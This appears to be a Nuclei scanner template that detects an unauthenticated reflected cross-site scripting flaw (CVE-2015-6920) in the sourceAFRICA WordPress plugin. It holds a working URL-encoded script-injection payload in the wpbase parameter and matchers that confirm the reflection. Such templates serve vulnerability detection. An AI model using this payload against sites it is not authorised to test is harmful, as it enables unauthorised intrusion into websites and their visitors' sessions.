id: CVE-2015-6920 info: name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability. reference: - https://packetstormsecurity.com/files/133371/ - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 classification: cve-id: CVE-2015-6920 tags: cve,cve2015,wordpress,wp-plugin,xss requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - '">' part: body - type: word part: header words: - text/html - type: status status: - 200